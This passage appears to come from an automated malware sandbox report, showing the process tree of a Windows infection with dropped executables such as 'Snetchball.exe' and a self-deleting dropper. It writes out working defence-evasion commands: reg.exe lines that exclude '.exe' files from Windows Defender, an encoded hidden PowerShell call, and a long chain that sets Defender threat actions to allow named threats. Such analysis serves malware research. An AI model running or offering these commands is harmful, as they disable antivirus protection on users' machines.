                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=3068,94041943469709422,663108720176713192,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11.1; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                    PID:2824
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                                                                                                                                                                  PID:6292
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                    PID:2600
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                      PID:4592
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                                                                                                                                                                    PID:708
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                        PID:5876
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                          PID:6008
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                            PID:5156
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                                                                                                                                                                            PID:5796
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                                                                                                                                                                            PID:3384
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                              PID:220
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                PID:1664
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                • Modifies Control Panel
                                                                                                                                                                                                                                                                                                                PID:6112
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                  PID:6136
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                    PID:1488
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                      PID:6652
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                      • Modifies Control Panel
                                                                                                                                                                                                                                                                                                                      PID:6304
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                        PID:7112
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                          PID:3304
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                          PID:3220
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                              PID:6000
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                PID:5880
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                  PID:4852
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                    PID:3308
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                      PID:5688
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                        PID:2236
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                          PID:4660
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                            PID:4556
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                                                                                                                                                                                                            PID:2228
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                              PID:6344
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                PID:6924
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5260
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7852
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                PID:4344
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                PID:2368
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                PID:1936
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                PID:4472
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4092
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2924,11820215124296507617,3570788744905853993,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                PID:4156
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ae5D41eH\OvohTJo7tfOZ52.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ae5D41eH\OvohTJo7tfOZ52.exe /u SUB=81cd2962a3d0f2dd3455186f77b391ce
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                          PID:2756
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NBQB5.tmp\is-LBE1T.tmp
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-NBQB5.tmp\is-LBE1T.tmp" /SL4 $303EC "C:\Users\Admin\AppData\Local\Temp\ae5D41eH\OvohTJo7tfOZ52.exe" 2331906 89088 /u SUB=81cd2962a3d0f2dd3455186f77b391ce
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                            PID:1312
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-607UV.tmp\_isetup\_RegDLL.tmp
                                                                                                                                                                                                                                                                                                                                              _RegDLL.tmp 1204 1132
                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                              PID:1868
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\net.exe" helpmsg 10
                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                PID:2208
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\net1 helpmsg 10
                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4308
                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\EGmeil\egmeil710.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\EGmeil\egmeil710.exe" /u SUB=81cd2962a3d0f2dd3455186f77b391ce
                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  PID:2604
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "egmeil710.exe" /f & erase "C:\Program Files (x86)\EGmeil\egmeil710.exe" & exit
                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2944
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                        taskkill /im "egmeil710.exe" /f
                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                        PID:388
                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:2644
                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:3708
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                              PID:4664
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4816
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4936
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:312
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4348
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\MIYBjYAhlshrJpIEE\eQQeaRcPNZZCeWQ\rcEMRRz.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\MIYBjYAhlshrJpIEE\eQQeaRcPNZZCeWQ\rcEMRRz.exe KZ /dOsite_idagJ 757674 /S
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                      PID:1272
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                        PID:1196
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5076
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:2420
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:784
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1108
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:4368
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1812
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
